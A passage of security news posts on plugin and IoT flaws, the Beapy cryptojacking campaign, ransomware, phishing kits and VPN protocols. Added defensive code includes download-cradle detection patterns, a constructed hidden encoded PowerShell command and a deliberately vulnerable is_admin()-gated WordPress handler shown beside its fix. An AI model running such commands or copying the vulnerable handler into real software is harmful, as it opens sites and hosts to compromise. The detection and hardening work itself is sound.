To mitigate the flaw, the experts suggest that owners of WordPress websites using the WooCommerce Checkout Manager plugin either disable the “Categorize Uploaded Files” option or disable the plugin altogether.
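The root cause described above is an upload handler that moves whatever it receives without checking it. As an added example of the general hardening pattern (written in Python, and not taken from the plugin or the researchers’ post), the handler below consults the client-supplied name only for its extension, checks the file content against the magic bytes of the allowed types, and writes the file under a random name to a directory that should sit outside the web root, so that a “.php” file, or PHP code dressed up with an image extension, is never stored where it could be executed. The sample uploads in demo() are constructed.

```python
"""A file-upload handler that checks what it stores, the control missing from
the vulnerable code described above.  Added example of the general hardening
pattern, written in Python and not taken from the plugin or the researchers:
the client-supplied name is only consulted for its extension, the content is
checked against the magic bytes of the allowed types, and the file is written
under a random name to a directory that should sit outside the web root."""
import os
import secrets
import tempfile

# Allowed types and the leading bytes a genuine file of that type starts with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    pass


def validate_upload(client_name, data):
    """Return the canonical extension to store the file under, or raise."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    ext = {"jpeg": "jpg"}.get(ext, ext)
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared type")
    return ext


def store_upload(client_name, data, upload_dir):
    """Validate and write the file under a random name; returns the path."""
    ext = validate_upload(client_name, data)
    stored_name = f"{secrets.token_hex(16)}.{ext}"
    path = os.path.join(upload_dir, stored_name)
    # O_EXCL: never overwrite an existing file, even on a name collision.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def demo():
    """Run constructed uploads through the handler; returns {name: outcome}."""
    cases = {
        "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "report.pdf": b"%PDF-1.4\n%constructed\n",
        "page.php": b"<?php echo 'not an image'; ?>",
        "page.php.png": b"<?php echo 'not an image'; ?>",
    }
    outcomes = {}
    with tempfile.TemporaryDirectory() as upload_dir:
        for name, content in cases.items():
            try:
                outcomes[name] = "stored as " + os.path.basename(
                    store_upload(name, content, upload_dir))
            except UploadRejected as err:
                outcomes[name] = "rejected: " + str(err)
    return outcomes


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:14} -> {outcome}")
```

Two design choices carry most of the weight: the stored name is generated by the server, so double extensions, path separators and other tricks in the client name never reach the filesystem, and the content check is tied to the extension the file will be stored under, so a mismatch is a rejection rather than a guess. Magic-byte checks are not proof of a benign file (a valid image can still carry an appended payload), which is why the upload directory must also be served without script execution.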


Cisco discovered several flaws in Sierra Wireless AirLink ES450 devices

Experts at Cisco Talos group disclosed a dozen vulnerabilities uncovered in Sierra Wireless AirLink gateways and routers, including several serious flaws.

Researchers at the Cisco Talos group disclosed a dozen vulnerabilities affecting Sierra Wireless AirLink gateways and routers, including several serious flaws. Some of them could be exploited to execute arbitrary code, modify passwords, and change system settings.

Sierra Wireless AirLink gateways and routers are widely used in enterprise environments to connect industrial equipment, smart devices, sensors, point-of-sale (PoS) systems, and industrial control systems (ICS).

“Several exploitable vulnerabilities exist in the Sierra Wireless AirLink ES450, an LTE gateway designed for distributed enterprise, such as retail point-of-sale or industrial control systems.” reads the analysis published by Cisco Talos.

“These flaws present a number of attack vectors for a malicious actor, and could allow them to remotely execute code on the victim machine, change the administrator’s password and expose user credentials, among other scenarios.”

Most of the issues reside in ACEManager, the web server included with the ES450. 


Experts discovered three flaws classified as “critical” (CVSS score 9.9) that can be exploited by an attacker to make changes to any system settings and execute arbitrary commands and code. An authenticated attacker could exploit the flaw by sending specially crafted HTTP requests to the targeted device.

Three other flaws, rated “high severity,” could be exploited by an authenticated attacker to change the user password and obtain plaintext passwords and other sensitive information. One of these issues affects the SNMPD function of the Sierra Wireless AirLink ES450 and can be exploited to activate hard-coded credentials on the device, resulting in the exposure of a privileged user.

The remaining issues are classified as “medium severity” and include cross-site request forgery (CSRF), cross-site scripting (XSS), and information disclosure flaws.

At the time of writing, Sierra Wireless has yet to release a security advisory for these vulnerabilities.


Millions of IoT Devices exposed to remote hacks due to iLnkP2P flaws

Experts discovered security flaws in the iLnkP2P peer-to-peer (P2P) system that expose millions of IoT devices to remote attacks.

Security expert Paul Marrapese discovered two serious vulnerabilities in the iLnkP2P P2P system developed by the Chinese firm Shenzhen Yunni Technology Company, Inc. The iLnkP2P system allows users to remotely connect to their IoT devices from a mobile phone or a PC. Potentially affected devices include cameras and smart doorbells.

iLnkP2P is widely adopted in devices marketed by several vendors, including Hichip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM.

The expert identified over 2 million vulnerable devices exposed online: 39% of them are located in China, 19% in Europe, and 7% in the United States. Roughly 50% of the vulnerable devices are manufactured by the Chinese company Hichip.

The first iLnkP2P flaw tracked as CVE-2019-11219 is an enumeration vulnerability that could be exploited by an attacker to discover devices exposed online. The second issue tracked as CVE-2019-11220 can be exploited by an attacker to intercept connections to vulnerable devices and conduct man-in-the-middle (MitM) attacks.

An attacker could chain the two issues to steal passwords and possibly remotely compromise the devices; all that is needed is the IP address of the P2P server used by the device.

Marrapese also built a proof-of-concept attack to demonstrate how to steal passwords from devices by abusing their built-in “heartbeat” feature, but he will not release it to prevent abuse.

“Upon being connected to a network, iLnkP2P devices will regularly send a heartbeat or “here I am” message to their preconfigured P2P servers and await further instructions.” reported Brian Krebs.

“A P2P server will direct connection requests to the origin of the most recently-received heartbeat message,” Marrapese said. “Simply by knowing a valid device UID, it is possible for an attacker to issue fraudulent heartbeat messages that will supersede any issued by the genuine device. Upon connecting, most clients will immediately attempt to authenticate as an administrative user in plaintext, allowing an attacker to obtain the credentials to the device.”


The expert has been trying to report the flaws to the impacted vendors since January but did not receive any response. He reported the flaws to the CERT Coordination Center (CERT/CC) at Carnegie Mellon University; the Chinese CERT was also informed of the discovery.

The bad news is that there is no patch for either issue, and experts believe fixes are unlikely to be released soon.

“The nature of these vulnerabilities makes them extremely difficult to remediate for several reasons,” Marrapese wrote. “Software-based remediation is unlikely due to the infeasibility of changing device UIDs, which are permanently assigned during the manufacturing process. Furthermore, even if software patches were issued, the likelihood of most users updating their device firmware is low. Physical device recalls are unlikely as well because of considerable logistical challenges. Shenzhen Yunni Technology is an upstream vendor with inestimable sub-vendors due to the practice of white-labeling and reselling.”

Marrapese recommends discarding vulnerable products; he also suggests restricting access to UDP port 32100 to prevent external connections via P2P.
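Because the heartbeat traffic described above goes out to the vendor’s P2P servers on a fixed UDP port, a perimeter flow log is enough to find the devices a network owner may not know it has. The script below is an added example (not the researcher’s code): it reads constructed one-line flow records of the kind a firewall or flow exporter produces, maps each internal source to the external hosts it reached on UDP/32100, ignores TCP hits and LAN-internal traffic on that port, and prints the iptables rules that implement the restriction Marrapese suggests. The internal address ranges are the RFC 1918 blocks and should be adjusted to the network in question.

```python
"""Spot devices on the LAN that talk to external hosts on UDP/32100, the
iLnkP2P port Marrapese suggests blocking.  Added example, not the
researcher's code; the log format below is constructed (one line per flow,
as a perimeter firewall or flow exporter might record)."""
import ipaddress
import re
from collections import defaultdict

P2P_UDP_PORT = 32100

# Adjust to the address space of the network being audited (assumption:
# RFC 1918 blocks).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed flow records.
SAMPLE_FLOWS = """\
2019-04-26T10:00:01Z src=192.168.1.23 dst=203.0.113.10 proto=udp dport=32100 bytes=84
2019-04-26T10:00:02Z src=192.168.1.23 dst=192.168.1.1 proto=udp dport=53 bytes=70
2019-04-26T10:00:09Z src=192.168.1.40 dst=198.51.100.7 proto=udp dport=32100 bytes=84
2019-04-26T10:00:11Z src=192.168.1.50 dst=203.0.113.10 proto=tcp dport=32100 bytes=520
2019-04-26T10:00:15Z src=192.168.1.23 dst=203.0.113.10 proto=udp dport=32100 bytes=84
2019-04-26T10:00:16Z src=192.168.1.60 dst=192.168.1.61 proto=udp dport=32100 bytes=84
"""

FLOW_RE = re.compile(
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) proto=(?P<proto>\S+) dport=(?P<dport>\d+)")


def p2p_talkers(log_text):
    """Map each internal source to {external destination: flow count} for
    UDP/32100 traffic.  TCP hits and LAN-internal destinations are ignored:
    iLnkP2P heartbeats are UDP datagrams to the vendor's P2P servers."""
    result = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = FLOW_RE.search(line)
        if not m:
            continue
        if m["proto"] != "udp" or int(m["dport"]) != P2P_UDP_PORT:
            continue
        dst = ipaddress.ip_address(m["dst"])
        if any(dst in net for net in INTERNAL_NETS):
            continue
        result[m["src"]][m["dst"]] += 1
    return {src: dict(dsts) for src, dsts in result.items()}


def block_rules():
    """iptables rules for the gateway's FORWARD chain: log the hits so the
    devices can be identified, then drop the traffic."""
    return [
        f"iptables -I FORWARD 1 -p udp --dport {P2P_UDP_PORT} -j LOG --log-prefix 'P2P32100 '",
        f"iptables -I FORWARD 2 -p udp --dport {P2P_UDP_PORT} -j DROP",
    ]


if __name__ == "__main__":
    for src, dsts in p2p_talkers(SAMPLE_FLOWS).items():
        print(f"{src} -> {dsts}")
    print("\n".join(block_rules()))
```

Blocking the port stops the device from registering with the P2P server, which also breaks the vendor’s remote-access app; that is the trade-off the researcher’s advice accepts. The LOG rule sits first so that the devices can be inventoried from the gateway’s kernel log before they are replaced.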

The researcher published technical details on his discovery here.


Beapy Cryptojacking campaign leverages EternalBlue exploit to spread

Security experts uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit.

Security experts at Symantec have uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit to spread a cryptocurrency malware on enterprise networks in Asia.

“Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.” reads the analysis published by Symantec.

“Beapy (W32.Beapy) is a file-based coinminer that uses email as an initial infection vector.”

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system; it is installed by leveraging ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that can trigger remote code execution on older versions of Windows (Windows XP to Server 2008 R2).

Every Windows machine running an old, unpatched version and exposing an SMB service is at risk. DOUBLEPULSAR and ETERNALBLUE have been available to anyone since the Shadow Brokers hacker group leaked an archive of NSA tools online.

Most of the victims are located in China (80%), with the remainder in South Korea, Japan, and Vietnam.

The experts first observed the campaign in January; almost all victims (98%) are enterprises.

The attack chain starts with a phishing email carrying an Excel document as attachment; the document downloads the DoublePulsar backdoor, which is used to deliver the EternalBlue exploit.

Once the backdoor is installed, a PowerShell command lets the malware connect to the command-and-control server. The malicious code executes further PowerShell scripts before the cryptocurrency miner is downloaded.

Experts reported that the Beapy malware also uses the popular post-exploitation tool Mimikatz to steal passwords from Windows systems.
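The chain above (a malicious Excel attachment, then PowerShell reaching out to a command-and-control server) shows up in endpoint telemetry as an Office process spawning a shell with a download-cradle style command line. The script below is an added detection example (not Symantec’s signature): it scores constructed process-creation events shaped like Sysmon event 1 fields (Image, ParentImage, CommandLine), flags Office-to-shell parentage and typical cradle arguments, and rates an event that shows both as high severity.

```python
"""Flag the process chain the infection description above implies: an Office
application spawning PowerShell that reaches out to the network.  Added
detection example, not Symantec's signature; the process-creation events are
constructed in the shape of Sysmon event 1 fields."""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments typical of download-and-run stagers.
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"-(enc|encodedcommand)\b",
    r"net\.webclient",
    r"downloadstring|downloadfile",
    r"invoke-webrequest|\biwr\b|\biex\b|invoke-expression",
    r"-nop\b|-noprofile\b",
    r"-w(indowstyle)?\s+hidden",
)]

# Constructed events (not real telemetry); the -enc payload is a placeholder.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"EXCEL.EXE" "C:\Users\alice\Downloads\invoice.xls"'},
    {"id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc <base64-placeholder>"},
    {"id": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"id": 4, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "cmd.exe /c echo test"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons an event is interesting (empty if none)."""
    child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    reasons = []
    if parent in OFFICE_APPS and child in SHELLS:
        reasons.append(f"{parent} spawned {child}")
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(ev["CommandLine"])]
    if hits:
        reasons.append("cradle indicators: " + ", ".join(hits))
    return reasons


def suspicious_events(events):
    """Return [(event id, severity, reasons)].  Office-to-shell parentage
    combined with cradle-looking arguments is 'high'; either alone is
    'medium' and worth a look in context."""
    out = []
    for ev in events:
        reasons = score_event(ev)
        if not reasons:
            continue
        parentage = any("spawned" in r for r in reasons)
        cradle = any(r.startswith("cradle") for r in reasons)
        out.append((ev["id"], "high" if parentage and cradle else "medium", reasons))
    return out


if __name__ == "__main__":
    for event_id, severity, reasons in suspicious_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {severity}: {'; '.join(reasons)}")
```

The parentage check is the robust part of this logic: legitimate workflows rarely have Excel or Word launching PowerShell, whereas the command-line patterns are easy to vary and will produce the occasional false positive (an administrator’s “-NoProfile” script, for instance), which is why they only raise severity rather than decide it.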

Experts at Symantec also discovered an earlier version of Beapy malware that hit a public-facing web server and that was attempting to spread to connected systems.

It was coded in C rather than Python; this version also includes both EternalBlue and Mimikatz. The malicious code also leverages exploits for known vulnerabilities in Apache Struts, Apache Tomcat, and Oracle WebLogic Server.

“In the web server compromise, Beapy also attempted to exploit an Apache Struts vulnerability (CVE-2017-5638). This vulnerability was patched in 2017, but if successfully exploited it can allow for remote code execution.” continues the analysis. “Beapy also tried to exploit known vulnerabilities in Apache Tomcat (CVE-2017-12615) and the Oracle WebLogic Server (CVE-2017-10271). In the case of this web server compromise observed by Symantec, exploit attempts began in early February, with connections to Beapy’s C&C server first observed on March 13. Activity targeting this web server continued until early April.”

Experts observed a spike in Beapy activity in March.

Since the Coinhive cryptocurrency mining service shut down in March, experts have observed a drop in cryptojacking attacks.

Unlike Coinhive, Beapy is a file-based miner that must be installed by attackers on the victims’ machines in order to mine cryptocurrency.

“As well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster.” states Symantec, “The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.”


The Beapy campaign was also spotted by other security firms, including Qihoo 360’s research team and Trend Micro.


The strengths and weaknesses of different VPN protocols

One in four internet users use a VPN regularly, but how much does the average user know about what goes on behind the software?

Pulling back the curtain, a VPN runs on various VPN protocols that govern the way a VPN client communicates with a VPN server. Different protocols establish the encrypted tunnel between your device and the internet in different ways.

The history of VPN protocols dates back to 1996, when a Microsoft employee came up with the Point-to-Point Tunneling Protocol (PPTP). The protocol, though not perfect, allowed people to work from home over a secure internet connection.

Since then, VPN protocol technology has evolved and, at the moment, there are five widely used VPN protocols. A breakdown of these five VPN protocols complete with their pros and cons is key to understanding VPN protocols in depth.


1. PPTP

As noted above, the Point-to-Point Tunneling Protocol was the first to be developed, and it is over 20 years old. The protocol relies on encryption, authentication and Point-to-Point Protocol (PPP) negotiation. In essence, that means it only needs a username, password, and server address to create a connection.

Most devices support PPTP, and because it is so easy to set up it is rather popular among VPN companies. PPTP is incredibly fast, and as a result people who want to circumvent geo-restricted content prefer the protocol.

However, the speed comes at the cost of encryption. Of all the protocols, PPTP has the weakest encryption. Even Microsoft recommends staying away from PPTP because, from a security standpoint where encryption is key, it is extremely unsafe.

That said, if your only concern is speed, then PPTP is the protocol for you.

Pros

  • Super-fast
  • Easy to set up and use
  • Nearly all platforms support the protocol

Cons

2. OpenVPN

First released in 2001, the OpenVPN protocol has become one of the most popular and widely used protocols. It is an open-source protocol which means coders can add to or edit the protocol, scrutinize the source code for vulnerabilities, and solve identified issues immediately.

OpenVPN uses SSL technology and is available on nearly all platforms, including Windows, Linux, iOS, Android, macOS, BlackBerry, and routers. It operates on both Layer 2 and Layer 3, and it includes extra features that facilitate the transport of IPX packets and Ethernet frames. Moreover, it has NetBIOS functionality and, depending on the setup, it can share port 443 with HTTPS.

OpenVPN is incredibly secure thanks to the fact that it uses a 160-bit SHA1 hash algorithm, AES 256-bit key encryption (in addition to others), and 2048-bit RSA authentication.

That said, OpenVPN has a significant weakness—the amount of latency or rather the considerable delay during operation. With the use of more powerful computers and the use of SSL certificates, one can get around this weakness.

Pros

  • Secure
  • Easily bypasses firewalls
  • Supports a variety of cryptographic algorithms
  • It is open-source which means it’s easy to vet
  • Supports Perfect Forward Secrecy

Cons

  • Needs third-party software for set-up
  • It can be difficult to configure
  • Potentially higher latency periods

3. L2TP/IPsec

To fully understand Layer 2 Tunneling Protocol (L2TP), it is essential first to mention Layer 2 Forwarding (L2F). Cisco developed L2F soon after the release of PPTP to try and improve on the flaws of PPTP. Unfortunately, L2F wasn’t perfect either.

Therefore, in 1999, the parties concerned released L2TP as an improvement on both PPTP and L2F. L2TP combines the best of both L2F and PPTP to provide a more secure and reliable tunneling protocol.

However, note that L2TP is simply a tunneling protocol and provides neither encryption nor privacy. Due to the lack of encryption, L2TP cannot function as a secure protocol alone and must be paired with IPsec which is a security protocol that carries with it the required encryption. The bundling of L2TP and IPsec protocols leads to the use of something known as double encapsulation.

In double encapsulation, the first encapsulation will create a PPP connection to a remote host and the second encapsulation will contain IPsec.

L2TP supports AES 256 encryption algorithms—some of the most secure—and it prevents man-in-the-middle attacks because data cannot be altered when in transit between the sender and receiver.

Bear in mind that due to the double encapsulation, the protocol has reduced speed. Moreover, the L2TP protocol can only communicate via User Datagram Protocol (UDP). The restriction to UDP means it is easy to block.

Pros

  • Secure according to most
  • Works in almost all platforms
  • Easy to set up
  • Supports multithreading which increases performance

Cons

  • Both Edward Snowden and John Gilmore noted that NSA might have deliberately weakened IPSec which means it can be compromised.
  • Firewalls can easily block it because it only communicates over UDP.
  • Slower than OpenVPN due to double encapsulation

4. SSTP

Secure Socket Tunneling Protocol (SSTP) is very similar to OpenVPN with the only difference being that it is proprietary software that Microsoft developed and introduced in Windows Vista.

Just like OpenVPN, SSTP supports AES 256-bit key encryption, and it uses 2048-bit SSL/TLS certificates for authentication. The protocol has native support for Linux, Windows, and BSD systems. The rest, e.g., Android and iOS, only have support via third-party clients.

Pros

  • Provides support for a wide range of cryptographic algorithms
  • Supports Perfect Forward Secrecy
  • Easy to use especially because the protocol is already integrated into Windows

Cons

  • Does not do as well on other systems as it does on Windows
  • It is impossible to audit underlying code because the protocol is proprietary

5. IKEv2

Internet Key Exchange version 2 (IKEv2) is a tunneling protocol that provides a secure key exchange session. The protocol was a collaboration between Microsoft and Cisco. Similar to L2TP, it is often paired with IPsec to provide for authentication and encryption.

IKEv2 is uniquely suited to mobile VPN solutions. That is because it is very good at reconnecting anytime there is a temporary loss of internet connection. Second, it is adept at reconnecting during a network switch (e.g. from mobile data to Wi-Fi).

IKEv2 is not as popular as OpenVPN, PPTP or L2TP/IPsec, but a good number of VPNs, especially those that specialize in mobile VPNs, use it. Because it is proprietary software, it only has native support for Windows, iOS, and Blackberry.

Pros

  • Extremely stable and does not drop the VPN connection when switching networks
  • Incredibly fast
  • Supports Perfect Forward Secrecy
  • Supports a variety of cryptographic algorithms
  • Easy to set-up

Cons

  • Suffers from the same IPsec drawbacks (NSA tampering)
  • Does not support a considerable number of platforms
  • Firewalls can block the protocol

Summary

From the discussion above, the one clear thing is that no one VPN protocol can satisfy all the user requirements. Some VPN protocols prioritize speed while others prioritize security.

Consequently, it is not a surprise to find a VPN provider that has found a way to incorporate all five in a bid to provide the best possible service.

About the author: Susan Alexandra

Susan Alexandra is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor in cryptocurrencies. Susan’s inbox is open for new ideas and stories; you can share story ideas at susanalexandra67@gmail.com

Pierluigi Paganini

(SecurityAffairs – VPN, privacy)


The post The strengths and weaknesses of different VPN protocols appeared first on Security Affairs.

Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware

The special-purpose vehicle maker Aebi Schmidt was hit by a malware attack that disrupted some of its operations.

The Aebi Schmidt Group is a manufacturer of product systems and services for the management, cleaning and clearance of traffic areas as well as for the maintenance of green areas in demanding terrain.

Aebi Schmidt focuses on manufacturing agricultural, municipal and other special-purpose vehicles, including snow blowers, street cleaners, and other machinery used in airports.

On Thursday Aebi Schmidt announced that its systems had been hit by a malware-based cyberattack. The incident caused the disruption of some of its operations, such as email management.

The malware only infected Windows systems; in response to the incident, the company temporarily switched off these systems.

“The IT system failure is due to an attempt by third parties to infiltrate malware into our systems. More and more companies worldwide are being affected by such attacks.” reads a note published by the company on its website.

Aebi Schmidt

The company notified customers and business partners of the incident and asked them to contact it by phone until its email systems are restored.

Fortunately, the cyber attack has not impacted production systems, order processing, US-based M-B Companies, or its telematics platform.

Windows systems are currently being “rebooted step by step,” but the process could be “time consuming.”

Aebi Schmidt did not share technical details of the cyber attack, but according to TechCrunch, the company was hit by ransomware.

“Aebi Schmidt, a European manufacturing giant with operations in the U.S., has been hit by a ransomware attack, TechCrunch has learned.” reads the post published by TechCrunch. “Schiess [spokesperson Thomas Schiess] would not comment on claims of ransomware specifically, but the source said staff were told during an all-hands meeting Wednesday that the incident was a ‘ransomware attack.’”

Recently another major European company was hit by ransomware: the aluminum giant Norsk Hydro suffered an extensive cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S. The company estimated more than $40 million in losses in the first week following the ransomware attack that disrupted its operations.

Pierluigi Paganini

(SecurityAffairs – Aebi Schmidt, ransomware)

The post Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware appeared first on Security Affairs.

Crooks abuse GitHub platform to host phishing kits

Experts at Proofpoint discovered that free code repositories on GitHub have been abused since at least 2017 to host phishing websites.

Researchers at Proofpoint reported that crooks are abusing free code repositories on GitHub to host phishing websites and bypass security defenses. Experts discovered that cybercriminals have been abusing the GitHub service since at least mid-2017.

The phishing websites were hosted on the canonical $github_username.github.io domain. Attackers are using stolen brand graphics to make their pages resemble the brand they were abusing.

“Since at least mid-2017, phishers have also been abusing free code repositories on the popular GitHub service to host phishing websites on the canonical $github_username.github.io domain.” reads the post published by Proofpoint. “threat actors establish a canonical code repository site within the github.io canonical domain that resembles the brand they are abusing.”

Inspecting the lookalike GitHub account used by the crooks revealed the files in the phishing kit, which are viewable as shown below; experts noticed that the HTML code is lightly encoded in order to obfuscate its content.

phishing Github sites

The code sends credentials provided by the users in an HTTP POST request to another compromised site under the control of the attackers.

The phishing kits do not use typical hosted PHP methods because the github.io platform does not provide PHP back-end services.

Experts observed that cybercriminals in some cases used the github.io domain as a traffic redirector with the intent to ensure that the actual phishing page remains live for a bit longer.

The drawback of using public GitHub accounts is that security researchers have major visibility into the threat actors’ activity and into the changes made to their phishing pages.

Proofpoint identified a particular user, “greecpaid,” who manages several phishing kits hosted on GitHub repositories.

Proofpoint reported its findings to GitHub that took down the accounts hosting phishing kits.

“In the past, threat actors have been able to evade detection by using well-known and trusted consumer cloud, social networking, and commerce services to host files as well as web hosts. Microsoft’s free accounts on the GitHub service, which have typically been used for Open Source and other public software development repositories, are equally vulnerable to widespread abuse,” Proofpoint concludes. 

Pierluigi Paganini

(SecurityAffairs – GitHub, cybercrime)

The post Crooks abuse GitHub platform to host phishing kits appeared first on Security Affairs.

Flaws in Social Warfare plugin actively exploited in the wild

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the popular WordPress plugin Social Warfare.

Social Warfare is a popular WordPress plugin with more than 900,000 downloads; it allows site owners to add social share buttons to a WordPress website.

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the Social Warfare plugin to take control over WordPress websites using it.

At the end of March, experts found a Cross-Site Scripting (XSS) vulnerability in Social Warfare installations (v3.5.1 and v3.5.2) that is actively exploited to add malicious redirects.

Maintainers of Social Warfare for WordPress also addressed a remote code execution (RCE) flaw; both issues were tracked as CVE-2019-9978.

The issue in the WordPress plugin has been fixed with the release of version 3.5.3 of the plugin. On the same day, an unnamed security researcher published technical details of the flaw and a proof-of-concept exploit for the stored Cross-Site Scripting (XSS) vulnerability.

Experts pointed out that attackers can exploit the vulnerabilities to take complete control over websites and servers and use them for malicious purposes, such as mining cryptocurrency or delivering malware.

The availability of the exploit code led attackers to attempt to exploit the vulnerability, but hackers were only able to inject JavaScript code to redirect users to malicious sites.

Experts at Palo Alto Networks discovered several exploits for both vulnerabilities in the wild, including an exploit for the RCE one.

“We also caught several samples exploiting these vulnerabilities in the wild,” reads a blog post published by Palo Alto Networks Unit 42 researchers. “Figure 5 shows a POST request from one of the samples:”

Social Warfare zero-day PoC

The root cause of both flaws is the misuse of the is_admin() function in WordPress.

“The root cause of each of these two vulnerabilities is the same: the misuse of the is_admin() function in WordPress,” the researchers say in a blog post. “Is_admin only checks if the requested page is part of admin interface and won’t prevent any unauthorized visit.”
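As an added illustration of the is_admin() misuse described above (example code written for this article, not Social Warfare’s actual code; the swp_demo_* function and option names are hypothetical), here is a settings handler gated only by is_admin() beside a hardened version that checks the caller’s capability and a nonce and escapes the stored value on output:

```php
<?php
// Added illustration, not the plugin's own code. Hypothetical names: swp_demo_*.

// VULNERABLE PATTERN: is_admin() only reports whether the request loads an
// admin-area page (admin-ajax.php included). It says nothing about who is asking,
// so an unauthenticated request still reaches the option update.
function swp_demo_save_settings_vulnerable() {
    if ( ! is_admin() ) {
        return; // checks "is this the admin interface", not "is this user allowed"
    }
    // Untrusted input is stored and later echoed into pages: stored XSS.
    update_option( 'swp_demo_custom_text', wp_unslash( $_POST['custom_text'] ?? '' ) );
}

// HARDENED PATTERN: authorize the user, verify a nonce (CSRF), sanitize input.
function swp_demo_save_settings_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', 'Forbidden', array( 'response' => 403 ) );
    }
    // check_admin_referer() terminates the request if the nonce is missing/invalid.
    check_admin_referer( 'swp_demo_save_settings', 'swp_demo_nonce' );

    $value = sanitize_textarea_field( wp_unslash( $_POST['custom_text'] ?? '' ) );
    update_option( 'swp_demo_custom_text', $value );
}

// Output side: escape on render so a stored value cannot inject markup or script.
function swp_demo_render_custom_text() {
    echo esc_html( get_option( 'swp_demo_custom_text', '' ) );
}
```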

Experts found about 40,000 sites that are using the Social Warfare plugin, most of which are running a vulnerable version.

Vulnerable websites belong to many industries, such as education, finance, and news; experts highlighted that many of these sites receive high traffic.

“There are many exploits in the wild for the Social Warfare plugin and it is likely they will continue to be used maliciously. Since over 75 million websites are using WordPress and many of the high traffic WordPress websites are using the Social Warfare plugin, the users of those websites could be exposed to malware, phishing pages or miners.” concludes Palo Alto Networks. “Website administrators should update the Social Warfare plugin to 3.5.3 or newer version.”

Pierluigi Paganini

(SecurityAffairs – WordPress, Social Warfare plugin)



The post Flaws in Social Warfare plugin actively exploited in the wild appeared first on Security Affairs.

Britain ‘Approves’ Huawei role in building ‘non-core’ parts for 5G Network

British Government has approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers

According to The Daily Telegraph newspaper, British Prime Minister Theresa May decided to assign a limited role to Chinese telco giant Huawei in the building of a 5G network in the UK.

The approval continues to raise concerns because the Government ignored security warnings from senior ministers and the US Government.

Home Secretary Sajid Javid, Foreign Secretary Jeremy Hunt, Defence Secretary Gavin Williamson, International Trade Secretary Liam Fox and International Development Secretary Penny Mordaunt raised serious concerns on the decision.

Britain’s National Security Council approved a limited role for Huawei to help build “non-core” infrastructure such as antennas.

“Theresa May has given the green light to a Chinese telecoms giant to help build Britain’s new 5G network despite warnings from the US and some of her most senior ministers that it poses a risk to national security.” reads the post published by The Daily Telegraph.

“The National Security Council, which is chaired by the Prime Minister, agreed on Tuesday to allow Huawei limited access to help build parts of the network such as antennas and other “noncore” infrastructure.”

The decision comes as the chancellor Philip Hammond prepares to travel to China to promote the participation of his government in the Belt and Road Initiative.

“According to one person briefed on the discussions, Mrs May approved “in principle” the recent assessment by the National Cyber Security Centre, part of GCHQ, that the risk from Huawei to future 5G telecoms networks could be mitigated.” reported The Financial Times.

At the time of writing, Digital Minister Margot James denied the news reported by the media.

“In spite of cabinet leaks to the contrary, final decision yet to be made on managing threats to telecoms infrastructure,” she tweeted.

“The decision has not been finally made yet and the Prime Minister will take advice from all of the relevant agencies and departments,” she told Sky News.

On the other side, Huawei praised the alleged decision of the UK government:

